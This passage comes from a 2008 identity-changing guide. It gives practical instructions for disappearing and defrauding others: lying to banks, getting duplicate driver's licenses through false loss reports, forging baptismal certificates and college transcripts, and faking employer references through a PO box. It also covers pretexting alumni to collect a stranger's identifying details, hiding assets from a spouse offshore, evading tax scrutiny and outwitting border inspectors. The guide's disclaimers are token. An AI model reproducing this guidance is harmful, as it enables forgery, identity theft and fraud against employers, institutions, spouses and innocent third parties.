+- Rent a storage locker and place a very good lock on it. +Place all the materials that might reveal your plans in it. On +the morn of your vanishing act visit the locker, destroy +everything and discard it when you get out of town. +- A Nevada, Wyoming or Delaware corporation is a handy +thing. You can rent mailboxes and open bank accounts all in +your corporate name, which makes it much harder to track +your activities. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 139 - +Reproduction in any form is prohibited without written permission. + +- When you open your corporate bank account do not give +them your new phone or address. Use a dummy address +and give them a invalid phone and say "the phone won't be +installed for a few days yet". Do not give them your new +prepaid cell number as it's activity can be traced. +- Do all your new banking through the ATM or online. Avoid +showing your face inside the bank. +- During your last months at your old location you might want +to consider using whatever frequent flyer miles you have to +take a vacation. But be sure to travel to a place distant from +your intended new location. Any other frequent flyer miles +should be abandoned as they create a simple to track link. +- Forget library cards and registering to vote (though you can +easily register under a fake name and use the card as useful +new ID). +Remember, fail to plan and you can plan to fail. Take your +time. Pay attention to details or it will all add up to nothing. +Witness Protection Program +Taking a look at the federal witness protection program may +give you some tips on how one might pursue a new identity. +Under the witness protection program, those who are willing +to testify against major criminals are provided with entirely +new identities by the federal government. +The following comes from several people who were actually in the +program. After you're approved and provide the testimony they +require, you're given your new identity. First you're stripped of +every form of ID you have in your present name. Then you're also +stripped of any other piece of paper that has your old name on it. +Until you actually appear in court you may be ferried around from +hotel to hotel for up to a year. It's a real grind and the feds may +abandon you if the prosecution isn't successful for whatever +reason. +Then you're provided with a set of five or six airplane tickets and +several sets of temporary ID. You're given a schedule for several +airline flights that will route you all over the nation. Each individual +ticket bears a different name. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 140 - +Reproduction in any form is prohibited without written permission. + +The first leg of your trip might take you from Miami to Dallas as Mr. +Miller. You stay in a hotel as Mr. Chambers. Two days later you fly +to Kansas City as Mr. Wilson and stay in a hotel for two days as +Mr. Mallory. +Then you fly to Denver as Mr. Anderson, stay there two days as +Mr. Phillips and then onto your final destination, Phoenix, Arizona +under your permanent new name. +There you visit a hidden facility on a military base where security +is extremely tight. You are provided with a full set of ID in your +new name. You practice your new signature and telling your new +personal history story until you can recite it smoothly without any +anxiety. If you have a regional accent, this can be a problem. Your +new life story will have to explain it away in a believable way. +All this flying around is necessary as it completely breaks any link +between your old and new identities. Anyone checking up on you +won't be able to track you as each flight and hotel reservation is +under a totally different name. +You can choose your new name but there are limits. No celebrity +names, no names of old friends or any name that in any way links +you back to your old identity. You can also choose which city you +want to live in, up to a point. Almost everyone wants to go to either +Hawaii or San Diego so these areas are not options. Almost +everyone also wants a sunny warm location, which is seldom +granted. Obscure places in small to medium sized cities located in +the northern half of the country seem to be most often used. +And another ban - you can't go anywhere where you have friends +or relatives. You have to be a complete unknown in your new +location. You will be provided with a "small stipend" for the first +few months but you will be forced to seek employment after that. +If you are uncooperative about seeking a job, you can be dropped +from the program. Uncle Sam isn't going to take care of you for +the rest of your life. +At first, most new entrants in the program are miserable. They +miss their friends, their old haunts, their families, everything +familiar. They are in a new environment that is entirely foreign to +them dealing with people with far different values and habits. In +short, they are fish out of water. +Even after all this - you can have problems. You can never apply +for a job that requires any kind of background check as your +working history won't stand up to close scrutiny. (It exists only on +paper) +© Copyright 2008, Ariza Research, All rights reserved - ABP - 141 - +Reproduction in any form is prohibited without written permission. + +You will also have to avoid any job that requires a security +clearance or a pre-employment polygraph test. All things +considered, you're actually living a lie so any careful examination +of you and your life will soon blow your cover. +Divorce is common, especially during those first months that +precede your court appearance. Here you are, your whole family, +crowded into a single hotel room for months and months moving +at random times into strange places. You're warned not to step +outside but how can you live cooped up for so long? Angers will +flare and old arguments will resurface. It's just human nature. +Though the government does all it can to facilitate the whole +process, a substantial percentage of program entrants drop out, +especially during those first months. Many former criminals can't +resist the temptation and return to their criminal ways in their new +location. +This is cause for immediate ejection from the program. Some get +homesick and phone up an old buddy - another stupid move that +will get you terminated. +Most people stay in the program for 2-3 years and then just walk +away. For some it's a good move but the stakes are high as those +who miscalculate can end up six feet under. Some have been +kicked out just for making the mistake of signing their old +signature or when their children spill the beans to their friends. +One man felt bound to attend his daughter's funeral – another +common mistake. +There must be a thousand different ways to blow your cover and +most people become fatigued with the constant anxiety. Being +always on guard must be draining. The least little slip could be all +your old enemies need. +One Call Does It All? +If you sniff around the web long enough, you'll run into +entrepreneurs that will offer to handle the whole identity-changing +process for you. For a up-front single fee (usually two to five +grand) they will get you a clean new birth certificate, drivers +license and may even throw in a passport and credit card. It +sounds inviting to let someone else who knows the ropes handle +the whole process while you sit back and relax. +They seem to be rather underground and probably associated +with the criminal world as they only communicate via email and +perhaps a phone call or two. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 142 - +Reproduction in any form is prohibited without written permission. + +It all sound so inviting that you send this guy cash or a money +order for a grand or two and sit back confident that soon you’ll be +somebody new. Two weeks later when you send him a reminder +note, your email message comes bouncing back with an +"Addressee Unknown" error attached to it. This bird has flown. +These guys are con artists plain and simple. They're long on +promises and very short on performance. Untraceable foreign +email accounts are a dime a dozen (actually they're entirely free!) +Even if they do ship you some identity documents, you can bet +they'll be either stolen or of very poor quality. Or if you get an +"honest" con man, he may charge you two grand for a camouflage +passport that costs him a mere $200. +Or perhaps he'll sell off your new identity info to some law +enforcement types. There are no easy shortcuts here - identity +changing is best done alone. +Some Other Passport Strategies +The US passport application process requires a personal +interview with a certified passport processor at a post office +facility. Though you may get a bored and disinterested clerk, +never underestimate these people. They are carefully trained +and most are extremely adept at uncovering deception. They +also have radar when it comes to forged documents. +Avoid applying in the big cities near international borders +and locations in the southern US where Illegal Hispanic +aliens are common. +Be prepared for questions, some of which are designed to +shake you up. They're looking for nervousness. So they may +ask silly questions that have nothing to do with your ability to +obtain a passport. Be calm and if asked for nonsense +information simply (and calmly) say "Gee, I don't know". +Getting a Second Drivers License +You can obtain a second drivers license by the following +method. First, if your DL is anywhere near expiring, renew +your license in the usual way. If you are given a choice on +how long your new license will last, go for the max, even if it +costs you a few extra bucks. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 143 - +Reproduction in any form is prohibited without written permission. + +Wait a few months and then call your local DMV office and +report your DL lost. After having dinner with friends you +remember dropping your wallet but you thought you picked +everything up but obviously not. You have lost your license +and need a new one. You are issued a replacement license. +This is a very common procedure these days. +Then you call the DMV office in the state you wish to issue +your new license - ask if testing is required or will they +accept your old license instead. Most will accept your old +license. Then you drive to your new location and apply for a +new license there, handing in your old original (Not the +replacement) license. +You now have two licenses in two different states. This can +be useful to help cloud the issue of where you live, to help +you document the "fact" that you live in the lower taxed state +or help you qualify for a lower tuition rate for state residents. +Unfortunately since all 50 states now share information on +DUI, speeding ticket points, suspensions and revocations, if +your license has been tagged in any of these ways, this +whole process will only get you into more trouble. Sorry. +Legal Eagles +We get inquiries all the time asking if a lawyer could handle +an identity change for a fee. The answer is - unless your +present situation is 100% legal and moral - forget it. +Attorneys are loyal to the courts and cops they plan to be +working with for years to come. In contrast, clients come and +go. If a lawyer smells even the slightest problem - you can +expect that most of them will turn you in a heartbeat. +And very few lawyers know anything about identity changing. +When you finish reading this report you'll know more than +98% of them. +In contrast a Private Investigator (PI) can, in some situations, +be useful. Problem is - you have to find one you can trust +completely and that's a very difficult hurdle. If you can get a +solid personal reference from a trusted friend - you might +have found your man. Your average PI has access to a ton +of otherwise unavailable information. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 144 - +Reproduction in any form is prohibited without written permission. + +And the best of them have extremely sneaky ways of getting +to the really heavily restricted info but don't expect them to +share their secret techniques. It's taken them a lifetime to +develop them and to a PI they are as valuable as the secrets +of a master magician. +Big Brother and Your Friendly Local Travel Agent +I love my country but the way our government treats it's +citizens makes me sick to my stomach. But it's amazing to +me how blindly most people trust our government. If they +knew the truth they'd be much more suspicious. +You drop in on your friendly local travel agent. You make +some reservations and purchase your tickets. The whole +process is easy, pleasant and you assume (quite wrongly) +that your travel plans are no one's business but your own. +Unfortunately, all reservations made in the US are handled +through a unified system that is closely monitored by - yup +you guessed it - the federal government. +A businessman forms a corporation in a secretive offshore +tax haven. He then makes reservations and flies down to his +new location to soak up the rays and check his rapidly +expanding tax-free bank balance. +A few weeks after his return home he receives a notice from +the IRS informing him of an upcoming audit. Could it be that +the IRS knows about his offshore dealings? You bet they do. +Any reservation made through any travel agent located in +the US is an open book. The IRS has compiled a list of 31 +offshore tax havens. When a US citizen takes several trips to +one of the offshore locations on their list - bad things begin +to happen. First your luggage may be torn apart by US +customs upon your return to the US and then the IRS may +place your entire tax history under a microscope. Several +years of annual tax audits follow. But some have found that +all this insanity can be avoided. +The easiest way is to fly to Canada and purchase your +overseas tickets there (don't use your frequent flyer program +if you're interested in staying off big brother's radar). +© Copyright 2008, Ariza Research, All rights reserved - ABP - 145 - +Reproduction in any form is prohibited without written permission. + +Or others have found this approach worthwhile. When you +make your reservations, convince your travel agent that +Mexico City, Costa Rica or Puerto Rico is your final +destination. Of course this trip is for tourism purposes only. +Tell them how much you're looking forward to spending +some time shopping and taking in the sights. +Or perhaps you enjoy photographing the many kinds of +tropical wildlife found there. Be very careful not to say +anything about any other travel plans. You'll be staying with +some friends there so won't need any hotel or rental car +reservations. +When you arrive at the airport there, you walk over to a +different airline's counter and purchase a ticket to your real +destination - an offshore tax haven. You pay for the ticket in +cash. +When you get to your final destination you avoid using your +credit card and also refrain from calling home unless you use +one of those international calling cards that can be +purchased for cash. (When the calling card has expired - +destroy it completely - Do not "recharge" it with your credit +card). Take enough cash with you to last through your entire +stay (unless you have some funds tucked away there). +Some Caribbean offshore locations will allow Americans to +visit their countries without showing their US passports. I +recently entered the Bahamas with only my Tennessee +driver’s license. The lady just waved me through with hardly +a glance. +The government there is more interested in getting your +cash than hassling you with security problems. This will work +well if you are an affluent looking American. +Gee, do you think anyone ever opened an offshore account +using one of those nifty camouflage passports? I've received +no new reports but I can imagine it's been tried. +One other thought to keep in mind is that the single most +dangerous threat to your privacy are the credit bureaus. We +live in the most computerized society in the history of the +world and these credit bureaus have many sources. But +when you travel overseas you drop off their radar +completely. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 146 - +Reproduction in any form is prohibited without written permission. + +The credit datahounds receive no input from foreign sources +nor do they provide any data to overseas firms. The US +credit bureaus have no influence over transactions in foreign +countries. Your US credit rating is entirely worthless there. +Drivers License Madness +The suicide high-jackers who hit on Sept. 11 all had US +driver’s licenses. After the attack DMV officials all over the +country came under fire for issuing drivers licenses too +easily. The states that were the most lenient in the issuing of +new drivers licenses were Tennessee, Utah, and Virginia. +For several decades migrant workers and other illegal aliens +have known that Tennessee is the state that grants drivers +licenses most easily. The reasons behind this are simple +enough to grasp. +The democratic parties in these states have passed motor- +voter bills that automatically register new driver license +holders to vote. +Since Tennessee doesn't even ask for a social security +number as a part of the license application service, you +might wonder why new licensees would automatically be +registered to vote. Simple - the politicians want it that way. +The more voters get registered, the better. It doesn't matter if +they aren't entirely legal. It doesn't matter if they're not +qualified. Don't ask questions - just sign 'em up! +Another issue revolves around these state's ongoing need +for Hispanic labor to work in the agriculture industry. They +want Spanish-speaking illegal aliens to come to their states +as it fattens the cheap labor pool. +Indeed, not only don't you need a social security number to +get a license in Tennessee and several other states but the +application and written test can be taken in Spanish or any of +a half dozen other languages. (Gee, how can a Spanish- +speaking foreigner drive safely when they can't read the +street signs?) +When interviewed concerning their lax procedures, the +director of the Tennessee drivers license system said that +their policies were under review but they didn't anticipate any +changes anytime soon. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 147 - +Reproduction in any form is prohibited without written permission. + +According to recent news reports Connecticut, South +Carolina and Florida no longer accept Tennessee drivers +licenses for conversion. +Anonymous Foreign Free Email Services +Below are links to various foreign free email services. With +them you can open a free email account and use it to +communicate anonymously with anyone anywhere in the +world. Your messages cannot be traced. [All services on the +list were verified 3-03] +http://www.ireland-information.com/freeemail.htm +http://www.mailasia.com/scripts/common/index.main?=us +signin=1&lang +http://www.timormail.com/ +http://www.emailgaul.com/email/scripts/loginuser.pl +http://www.anjungcafe.com/ +http://www.flytecrew.com/ +http://www.kichimail.com/templates/common/us/tos.htm +http://www.norikomail.com/templates/common/us/tos.htm +http://mail.wawasan2020.com/email/scripts/useragreement.p +l +http://server1.mymail.ph/email/scripts/loginuser.pl +http://philippines.to/ +http://www.singmail.com/ +http://mail.bkkmail.com/templates/common/us/tos.htm +http://vol.vnn.vn/cgi-bin/webmail4.2/register? +REGISTER=TRUE&INTERFACE=E +http://www.asia-links.com/members/register.asp +© Copyright 2008, Ariza Research, All rights reserved - ABP - 148 - +Reproduction in any form is prohibited without written permission. + +http://www.eastmail.com/ +http://www.fepg.net/foreign.html +http://www.email.is/login.asp +http://www.operamail.com/templates/common/us/tos.htm +Re-entering the USA +Ok so you've been overseas for a while for whatever reason +and are now ready to come back home. For the vast majority +of returning citizens this is a routine process that goes +smoothly but a bit of planning and knowledge will help you +avoid any problems. +First of all, dress conservatively. You must look like a nice +honest citizen returning from a vacation or business trip. Do +you remember all that legal stuff they taught you back in high +school civics? And do you recall all that mumbo-jumbo about +cops needing a search warrant to look at your property. And +that stuff about you being innocent until proven guilty. +Remember? +Well, when you cross a US border - forget it - none of that +applies! The inspectors who question you have a legal right +to look wherever they please (this includes strip searching +you, plowing through your baggage and even disassembling +your car). And they can put you through living hell on nothing +more than a "hunch". They don't need evidence. +If they suspect something is wrong - the burden of proof is +on you. You have to, by law, answer any questions they care +to ask for as long as it takes. That's right - you are guilty until +you prove your innocence to their satisfaction. +This is all because the US Supreme Court has decided that +crossing a border is a voluntary act so the usual +constitutional protections don't apply. +If all goes well you should be in front of an inspector for less +than one minute. If the conversation lasts longer than that, +you'll probably end up going through a second much more +detailed inspection (called a "secondary"). +© Copyright 2008, Ariza Research, All rights reserved - ABP - 149 - +Reproduction in any form is prohibited without written permission. + +Be nice and friendly in answering any questions. If you do or +say anything that irritates the inspector, remember - he is a +position to make your life a living hell. +These inspectors have an extremely boring job so do +everything you can to make things go smoothly and they will +reward you with a quick and easy transaction. Inspectors are +not nasty bastards who are dead set on causing you +headaches. +Instead they're just regular people who want to keep the line +moving as quickly as possible. Most of what they say and do +is repeated over and over again so they operate in a kind of +fog. And never assume that they're stupid as they're not. +Your chances of fooling an experienced inspector are +remote so don't even try. +Here is something any American should consider. Before +you leave make good quality photocopies of your birth +certificate and all pages of your passport. +Should you lose your passport while overseas you could +quickly find yourself in a rather sticky situation as the State +Department requires a birth certificate verification before a +replacement can be issued. If you have a copy of your +original passport, the verification is unnecessary. +The inspector has the right to search your wallet (or purse) +either in front of you or in another room. Also be sure not to +have receipts for items purchased while overseas. +Inspectors have dual responsibilities. They are both an +immigration agent concerned with illegal aliens entering the +US and also have customs responsibilities. +Do not carry any prescription drugs with you that would +indicate that you suffer from any serious infectious or mental +diseases. They are a dead tip-off that you have a problem +and there are rules against letting seriously sick people into +the US. If you act strangely, you may have earned yourself a +second conversation with a public health type who may well +refuse you entry. +Needle tracks and drug paraphernalia are another tip-off that +will get you and your baggage torn to shreds in a frantic +search for illegal drugs. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 150 - +Reproduction in any form is prohibited without written permission. + +If you're traveling with a friend but want to appear as +separate travelers, be sure to act like strangers from the +moment you enter the building. Don't even glance at each +other. While in line you are being carefully watched and any +indication of communication will result in a more in-depth +investigation. +If anyone in line starts up a conversation immediately +assume that they are government agents who are attempting +to pump you for information. Keep the conversation light. Do +not respond in any way to probing questions. +The inspector may ask you if you've ever been arrested. If +he doesn't believe your answer he may launch into +something like the following: "I suspect you of being involved +in illegal activities. I am of the opinion that you have been +arrested in the past. Now we can detain you and search the +records or you could just come clean right now and you can +be on your way." +This is a trap. His threat is probably an empty one. Admitting +to a felony arrest is grounds for denying you entry (agents +call this "dumping" an applicant). Or he may ask you if you +have any minor arrests like traffic offenses or other minor +crimes like burglary. If you admit to being arrested for +burglary - you will probably be immediately dumped. +The inspector’s motto is - small lies mask large lies. Don't +ever attempt to carry over $10,000 in cash out of the +country. The new money has coded strips that can be +detected. +Those who smuggle large sums use either large +denomination bills (Singapore has a single bill that's worth +over $8,000 and diamonds or other expensive gems or +jewelry are another highly-liquid forms of portable wealth that +can be easily converted to any currency you like almost +anywhere in the world. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 151 - +Reproduction in any form is prohibited without written permission. + +Baptismal Certificates +I just thought I’d include a note here about baptismal +certificates. It’s simply amazing how often someone will +accept a simple forged baptismal certificate. After all it’s not +an official government document in any real sense and as +such isn’t readily certifiable. +And if you add a raised seal using the strategies discussed +above, you will have an ID document that can be quite useful +though extremely easy to come up with. I recommend you +make one up and have it with you when you are seeking +other ID documents. +Blank baptismal certificates can be purchased at church +supply stores but you may have to buy a pack of a hundred +just to get one. +Also, you can buy a wallet-sized "certificate of ordination" +proving that you are a reverend in one of several "churches". +You can find these outfits listed in the classified section of +the "National Enquirer" which you can find at your local +grocery store. For $5 you’re a reverend, for $10 a Priest and +for $50 you can be a real Bishop! Note: forget the ads you +see there that offer blank drivers licenses and other fake ID. +It’s all real junk. Looks like some high-school kids made the +stuff up. +Phone Numbers of Vital Record Offices +Alabama (334) 206-5418 +Alaska (907) 465-3391 +Arizona (602) 255-3260 +Arkansas (501) 661-2336 +California (916) 445-2684 +Colorado (303) 756-4464 +Connecticut (860) 509-7897 +Delaware (302) 739-4721 +District of Columbia (202) 645-5962 +Florida (904) 359-6900 +Georgia (404) 656-4900 +Hawaii (808) 586-4533 +Idaho (208) 334-5988 +Illinois (217) 782-6553 +Indiana (317) 233-2700 +Iowa (515) 281-4944 +© Copyright 2008, Ariza Research, All rights reserved - ABP - 152 - +Reproduction in any form is prohibited without written permission. + +Kansas (785) 269-1400 +Kentucky (502) 564-4212 +Louisiana (504) 568-5152 +Maine (207) 287-3184 +Maryland (400) 764-3038 +Massachusetts (617) 753-8600 +Michigan (517) 335-8656 +Minnesota (612) 676-5120 +Mississippi (601) 576-7450 +Missouri (573) 751-6400 +Montana (406) 444-4228 +Nebraska (402) 471-2871 +Nevada (775) 684-4280 +New Hampshire (603) 271-4654 +New Jersey (609) 292-4087 +New Mexico (505) 827-2338 +New York (518) 474-3075 +New York City (212) 788-4520 +North Carolina (919) 733-3526 +North Dakota (701) 328-2360 +Ohio (614) 466-2531 +Oklahoma (405) 271-4040 +Oregon (503) 731-4095 +Pennsylvania (724) 656-3100 +Rhode Island (401) 222-2811 +South Carolina (803) 734-4830 +South Dakota (605) 773-3355 +Tennessee (615) 741-1763 +Texas (512) 458-7111 +Utah (801) 538-6105 +Vermont (802) 863-7275 +Virginia (804) 225-5000 +Washington (360) 236-4300 +West Virginia (304) 558-2931 +Wisconsin (608) 266-1371 +Wyoming (307) 777-7591 American Samoa (684) 633-1222 +ext. 214 +Guam (671) 734-4589 +Puerto Rico (787) 728-7980 +Virgin Islands: +St. Croix (340) 773-4050 +St. Thomas (340) 774-9000 ext. 4621 or 4623 +Canal Zone - No phone number available, write to: +Panama Canal Commission +Vital Statistics Clerk +APOAA, 34011 +© Copyright 2008, Ariza Research, All rights reserved - ABP - 153 - +Reproduction in any form is prohibited without written permission. + +Employment References +Entering the employment arena with a new identity can be a +problem. If you’re lucky enough to have a friend who owns a +small business, they can provide you with an employment +reference. Others have approached small family businesses +with an offer to pay cash up front for a good reference. +While others have used the following system: They open a +commercial post box. When they apply for a job, they list +their last employer as ITT, AT&T, IBM or some other well- +known large international firm. On the employment +application they list an imaginary boss’s name and list their +local PO Box as their official business address. This way you +will receive the prospective employer’s reference request +letter yourself and will be able to reply to it in any way you +wish. Sneaky isn’t it? +This technique works because large corporations have +offices all over the country and most companies refuse to +provide phone references anymore. Lawsuits have made it +very dangerous to chat openly about former employees. +For that reason, today most employers provide only a +confirmation of past employment, dates of employment and +position title. In particular any discussion of job performance +or cause of termination can lead to expensive legal +problems. +It never fails to amaze me how easily most people will gladly +accept the most worthless documents as "proof" of this or +that. Income can be "proved" in a number of different ways +using all sorts of easily doctored forms. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 154 - +Reproduction in any form is prohibited without written permission. + +Banking Security +Many freedom-loving individuals are busily transferring their +funds to "offshore" banks in the Caribbean these days. Is +this really necessary? Perhaps, but you should know that +there is one state right here in the good old US that will give +you better banking security than the other forty-nine. And +while it ain't Switzerland, it's better than nothing. +You can open a bank account in Nevada complete with a +Visa or MasterCard debit card. And since Nevada laws on +banking privacy are much stricter than any other state, your +financial information is comparatively secure. +Nevada hasn't signed an information exchange agreement +with the IRS, so the tax boys will have to go to court if they +want access to your records. How good is this protection? +Provided you aren't involved in anything illegal - the +protection is quite good. If you're a criminal looking to +launder drug money - forget it. +Some have found the following tactic very effective. They +collect all their mail for a week or more. They leave the +envelopes pile up unopened. The day of your departure they +write "Deceased" across the front of each envelope in ink +and throw them all in the nearest mail box as they leave +town. +Offshore Tactics +Ron M. owned a small retail store in a Midwestern city. After +16 years of married life he began to suspect that his +marriage was headed for the rocks. Ron didn't want a +divorce, and even worse - he deeply feared the financial +damage a divorce would inflict upon his future lifestyle. So +he decided to take decisive action. +During his college years Ron became interested in collecting +coins. After buying many different kinds of coins, he found +US silver dollars particularly interesting. He spent long hours +reading coin books in the library and doing other research on +the Internet. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 155 - +Reproduction in any form is prohibited without written permission. + +After two years Ron had became somewhat of an expert on +the subject of investing in US coins for profit. In his spare +time he began writing a guide on the subject. He was +convinced that such a book could be sold to the general +public at a nice profit. To speed the project along, he hired a +young college girl who did some "ghost" writing. In a few +short months he had his first draft. +He then launched a web site that offered instant online +access to his new book. Sales took off quickly and within a +few months he was taking in around a thousand bucks a +month. At this point he was confident that this was only the +beginning. He knew that if he would invest all his profits in +expanded advertising, his business would soon take off and +start bringing in some really serious cash. +He then assembled a "grub stake" of around three thousand +bucks and offered his wife a week-long vacation on the +lovely Caribbean island of Nevis. +While his wife was off shopping one afternoon, Ron stole +away and used his grub stake to open an offshore bank +account at a local Nevis bank, and also signed a contract +with a Nevis web host to register his site URL under his new +offshore corporate name, and set up his site hosting. +The bank also set up credit card merchant services and +even gave Ron his own MasterCard complete with full +international ATM access. +Here's how Ron's new business venture worked. Customers +would go to Ron's site and purchase his book online using +their credit cards. His bank in Nevis would then process the +credit card transaction and deposit the funds in Ron's Nevis +bank account. +Ron could then withdraw cash at any ATM machine in the +world with his new MasterCard/ATM card. Or he could make +purchases at any vendor that accepted MasterCard credit +cards. +Either way the transactions would be entirely anonymous, as +the vendor would only see a short numerical code that +authorized the transaction and no other information. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 156 - +Reproduction in any form is prohibited without written permission. + +And the best part is - since the entire business is conducted +offshore, no one (including his wife) would ever know the +details of his business activities or the level or even the +existence of his bank balance. (Banking privacy laws in +Nevis are extremely strict. In fact, anyone arriving in Nevis +who plans to penetrate their banking records can be slapped +in jail under Nevis law!) +Ron had another little goal I might mention. He hated the +IRS and used to rant on and on about the huge chunk the +IRS kept taking out of his hide. By locating his entire +operation offshore he could realize a very old dream. For the +first time in his life his business was entirely tax-free. (Most +offshore tax havens charge little or no tax on money earned +outside of their country.) Now you understand that I can't +endorse cheating the IRS but Ron felt it was more than +worth the effort. +Next came a major promotion. Ron plowed all his profits +back into the business. Sales grew handsomely over the +next year. Ron skimmed some other funds from here and +there which he transferred (by international money order) to +his exploding, tax-free Nevis bank account. +By the time the divorce finally occurred, Ron had arranged +things in such a way that his wife came away with but a +small slice of Ron's true wealth. Oh, she definitely suspected +that Ron was hiding something - but what could she do? Her +attorney ran a financial asset check on Ron but it came up +nickels and dimes! +Today Ron and his new wife make regular trips to Nevis to +check on his rapidly ballooning bank balance and lounge in +the sun on the beautiful white sand beaches of the lovely +little island. +If you don't need to transfer a business offshore, you might +consider this. For two or three thousand you can have an +offshore corporation formed. Anyone who desires personal +and financial privacy can use such an entity in numerous +creative ways. Some kinds of offshore corporations can be +used to make investments anywhere in the world. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 157 - +Reproduction in any form is prohibited without written permission. + +You open an offshore bank account in your corporate name +and use it to safely hide funds. Or you could use the +corporation for the purpose for which it was intended - to +conduct business. Your corporation could also be used to +own a trust which can be used to hide many kinds of +financial transactions. The opportunities are truly endless. +And how is this for a creative solution to a real problem? +Should any kind of investigator make an inquiry with your +offshore bank, you can have things set up so that the letter +triggers an immediate transfer of your entire account to yet +another bank located in yet another offshore banking haven! +How's that for security? I'm sure you can see why anyone +who attempts to investigate offshore banking accounts +knows they are faced with a supremely frustrating task. Most +know this all too well and so won't bother to try. +But be warned these offshore waters are full of cheats and +swindlers. Before you shell out any cash - be very, very sure +exactly who you are doing business with! +Suckers send off substantial sums by money order to +offshore operators who quickly vanish with their cash! Just +because they have a slick web site with a phone number and +mailing address doesn't mean they're legitimate. Do your +homework carefully! +Need a College Degree? +(Here are a half a dozen different methods) +Warning: Claiming a degree using these techniques could +leave you with a ticking time bomb in your resume. You +might lose a job, a promotion of actually get yourself +arrested in some jurisdictions. The author and publisher do +not advocate deceiving employers in this way. +There are several very different approaches to consider +here. A copy of a genuine transcript could be altered to +change the name and personal information at the top to +reflect a new identity and then several copies could be +made. Then when the subject of transcripts comes up in a +job interview, the copies could be just handed over. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 158 - +Reproduction in any form is prohibited without written permission. + +Many employers will accept them if the applicant looks +convincing. +Or you could use an entirely different approach. Some have +actually used forged transcripts to get admitted to a new +university where they earned a more advanced graduate +degree. This is known as "leap-frogging". Isn't an MBA better +than a lowly BS? Or you could use a college level GED +certificate to gain entrance. (95+% of colleges accept them) +Or if an employer insists on receiving transcripts directly +from your university, you could provide them with the +school’s mailing address, which would be your commercial +PO Box. You then send them your transcripts. +Here is another approach that might harm an innocent +person's life so should be carefully used. A help wanted ad is +run aimed at someone with a degree in a desirable major. +The offered salary should be generous yet believable. The +ad must state that the job requires the desired degree. +Then the applicants are combed for a likely match. By +sending out a standard employment application form (which +can be easily purchased at any office supply store) much +more detailed information on the applicant can be obtained. +The genuine transcripts can then be obtained directly from +the university. +Then there is always the alumni approach. You call the +alumni association of a good school and purchase an alumni +book for the department in your discipline. You can get some +useful info over the phone if you play your cards right. +Then call the prospect directly. Tell them that you're updating +the alumni association's data files and extract even more +info. You'll need birth date and student number. +Here is an interesting little list. It contains information on +some institutions of higher learning that are no longer in +business. And if they're no longer around, verifying a degree +with them is going to be a problem. This means that it's +probably impossible to verify whether or not you ever +attended classes or earned a degree with them. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 159 - +Reproduction in any form is prohibited without written permission. + +Also, some of the schools listed below were not properly +accredited though some did sincerely attempt to provide +honest educational services. But if you're leaving your old life +behind and need an established educational qualification, +claiming a unverifiable degree from one of these belly-up +universities might be just the ticket. +For a more complete listing and for information on earning +accredited and unaccredited degrees, get a copy of "Bears' +Guide to Earning Degrees Nontraditionally" by John B. Bear, +Ph.D.s +Institution Name Location Degrees Offered +Abilene Christian Abilene, +M.S. in Management +University Texas +American College Sunnyvale, +Business/Finance +of Finance California +American National LaPalma, Undergraduate +University California Degrees +San +Bay Area Open Undergraduate +Francisco, +College Degrees +California +Boulder Graduate Boulder, +Masters - Psychology +School Colorado +California American Escondido, +M.S. in management +University California +College of San +International +Professional Francisco, +Business +Studies California +New +Franconia College +Hampshire +Franklin and Lancaster, +M.S. in physics +Marshall College Pennsylvania +Houston +Houston, +International Social Work +Texas +University +International Los Angeles, +Various - All levels +College of L.A. California +International St. Louis, Ph.D. +Graduate School Missouri Business/Education +Sacramento, +Justice University Law +California +Louisiana Central Metairie, +University Louisiana +© Copyright 2008, Ariza Research, All rights reserved - ABP - 160 - +Reproduction in any form is prohibited without written permission. + +Santa +Ocean University Monica, Law +California +Professional Phoenix, All levels - Mental +Studies Institute Arizona Health +Russell Sage +New York All levels - Education +College +Southeastern +Institute of Alabama B.S. in Engineering +Technology +University of Mid- Council +All levels (inc. Ph.D.) +America (Iowa) Bluffs, Iowa +Washington +Washington, +International B.A. +D.C. +College +Grand +Western Colorado +Junction, All levels +University +Colorado +Wyoming College +of Advanced Wyoming M.B.A. +Studies +There are two situations where these shortcut approaches +will definitely not work. Any job that requires a US +Department of Defense security clearance will require an in- +depth investigation. (all identity-changers should forget any +job that requires a high level security clearance) They aren't +happy just combing databases for negative information. +They actually go out and verify positive info. Interviewing +your college professors is a common practice in such cases. +Another problem area would be the pursuit of a officer's +commission in the US military. The FBI handles the +investigations for prospective military officers and these guys +are real pros who will personally contact your grade school +teachers to have a chat about your record way back then. +Every bit of your personal history will be confirmed and +verified. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 161 - +Reproduction in any form is prohibited without written permission. + +The Academic Name Change +Here is a devious new approach. Though policies vary +widely, every university has been approached by at least +one graduate who has legally changed their name. Of +course they need to have the name on their official school +record changed. This may require a personal visit or the +intervention of a lawyer but either way - it can be done. Your +new birth certificate and your court name change decree will +do the trick. To be sure - it's an unusual request but not +entirely unheard of. +Demand that all future correspondence be carried on in your +new name only. +There will be a link between your two identities recorded in +the school's records, but that shouldn't provide any problems +under most circumstances. +Here's another approach. Get a copy of this book: "Bear's +Guide to Non-Traditional College Degrees: How to Get the +Degree You Want" by John Bear. This book discussed a ton +of very interesting educational alternatives. Here you will find +hundreds of ways to obtain accredited and quasi-accredited +degrees. If you require a degree in a hurry, this is yet +another route you should explore. +And these days there are more and more universities +springing up on the web that offer online instruction in a host +of different disciplines. This area of academia will certainly +continue to explode as the years pass. +Go to google.com and do a search on "online education" and +look around. I'm sure we're within a year or two of a degree +that can be earned entirely by online study. +In the past there was only form of accreditation that mattered +when it comes to a college degree but today all that is +changing. California has introduced an entirely different +approach. Some California schools that haven't earned full +regional accreditation have managed to obtain state +accreditation instead. +In a nutshell this means that California employers will almost +always accept such a degree. But will employers in other +states accept these degrees? No one knows. This new +approach to 